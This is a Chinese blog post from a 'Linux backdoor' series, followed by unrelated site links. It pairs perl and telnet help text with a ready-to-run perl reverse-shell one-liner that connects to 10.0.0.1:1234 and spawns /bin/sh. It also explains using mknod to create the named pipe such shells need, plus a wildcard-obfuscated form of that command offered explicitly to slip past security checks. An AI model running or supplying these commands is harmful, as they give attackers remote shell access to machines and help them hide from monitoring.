mknod | Linux 后门系列
时间:2022-07-23
本文章向大家介绍mknod | Linux 后门系列,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
0x01 perl
Ubuntu 16.04 自带 perl
Usage: perl [switches] [--] [programfile] [arguments]
-0[octal] specify record separator ( , if no argument)
-a autosplit mode with -n or -p (splits $_ into @F)
-C[number/list] enables the listed Unicode features
-c check syntax only (runs BEGIN and CHECK blocks)
-d[:debugger] run program under debugger
-D[number/list] set debugging flags (argument is a bit mask or alphabets)
-e program one line of program (several -e's allowed, omit programfile)
-E program like -e, but enables all optional features
-f don't do $sitelib/sitecustomize.pl at startup
-F/pattern/ split() pattern for -a switch (//'s are optional)
-i[extension] edit <> files in place (makes backup if extension supplied)
-Idirectory specify @INC/#include directory (several -I's allowed)
-l[octal] enable line ending processing, specifies line terminator
-[mM][-]module execute "use/no module..." before executing program
-n assume "while (<>) { ... }" loop around program
-p assume loop like -n but print line also, like sed
-s enable rudimentary parsing for switches after programfile
-S look for programfile using PATH environment variable
-t enable tainting warnings
-T enable tainting checks
-u dump core after parsing program
-U allow unsafe operations
-v print version, patchlevel and license
-V[:variable] print configuration summary (or a single Config.pm variable)
-w enable many useful warnings
-W enable all warnings
-x[directory] ignore text before #!perl line (optionally cd to directory)
-X disable all warnings
perl 和 Python 在做反弹shell基本差不多,Python 那一节有点讲的太多了,大家可以对比一下参数,照着Python的思路移到 perl 上,我不太懂 perl ,这里就直接上反弹shell的命令了
- -e / -E
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
0x02 telnet
Ubuntu 16.04 自带 telnet
Options:
-4 Force IPv4 address resolution.
-6 Force IPv6 address resolution.
-8 Request 8-bit operation. This causes an attempt to negotiate the TELNET BINARY option for both input and output. By default telnet is not 8-bit clean.
-E Disables the escape character functionality; that is, sets the escape character to ``no character''.
-L Specifies an 8-bit data path on output. This causes the TELNET BINARY option to be negotiated on just output.
-a Attempt automatic login. Currently, this sends the user name via the USER variable of the NEW-ENVIRON option if supported by the remote system. The username is retrieved via getlogin(3).
-b address
Use bind(2) on the local socket to bind it to a specific local address.
-d Sets the initial value of the debug toggle to TRUE.
-r Emulate rlogin(1). In this mode, the default escape character is a tilde. Also, the interpretation of the escape character is changed: an escape character followed by a dot causes telnet to disconnect from the remote host. A ^Z instead of a dot suspends telnet, and a ^] (the default telnet escape character) generates a normal telnet prompt. These codes are accepted only at the beginning of a line.
-S tos Sets the IP type-of-service (TOS) option for the telnet connection to the value tos.
-e escapechar
Sets the escape character to escapechar. If no character is supplied, no escape character will be used. Entering the escape character while connected causes telnet to drop to command mode.
-l user
Specify user as the user to log in as on the remote system. This is accomplished by sending the specified name as the USER environment variable, so it requires that the remote system support the TELNET NEW-ENVIRON option. This option implies the -a option, and may also be used with the open command.
-n tracefile
Opens tracefile for recording trace information. See the set tracefile command below.
host Specifies a host to contact over the network.
port Specifies a port number or service name to contact. If not specified, the telnet port (23) is used.
telnet 反弹shell的方式和 nc 是一样的,在这里不过多描述了
在这里再添加一点之前遗漏的小东西
0x03 mknod
[+] 之前创建命名管道都是用 mkfifo ,今天我发现了一个命令 mknod ,这个命令是用来创建一个文件块,可以用来创建设备,包括以下设备:
- 块设备(b)
- 字符设备 (c)
- 没有缓冲的字符设备 (u)
- fifo设备(p)
之前我们创建一个命名管道是 mkfifo /tmp/f
, 现在可以 mknod /tmp/f p
[+] 如果怕被安全检查, ` + * 是真好使呀
就拿上面那个为例
- mknod /tmp/f p
- `/*i*/m*no*/ /t*p/f p`
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- 【答疑解惑】为什么你的 Charles 会抓包失败?
- Mybatis-generator 逆向工程 自定义PO,xml,mapper,example
- 高速上云/网络穿透/视频上云网关EasyNTS组网服务登录状态检测优化记录
- 树莓派基础实验38:逻辑分析仪分析PWM、UART信号
- 【终端设备】视频上云/网络穿透EasyNTS云组网硬件终端无法单独修改账号的优化方式
- 测试环境问题排查的那些事儿
- RTSP流媒体协议视频平台EasyNVR和EasyNTS智能云组网同一浏览器运行为什么会导致EasyNTS无法登陆?
- Java:手写线程安全LRU缓存X探究影响命中率的因素
- 视频上云/网络穿透/网络映射服务EasyNTS设备管理为什么会出现无法搜索到设备的情况?
- 快速打造属于你的接口自动化测试框架
- 大数据下的质量体系建设
- PostgreSQL 日志系统 及 设置错误导致磁盘塞满案例
- 六、乘胜追击,将剩下的Git知识点搞定
- 树莓派基础实验39:解析无线电接收机PWM、SBUS信号
- nodejs源码分析第十九章 -- udp模块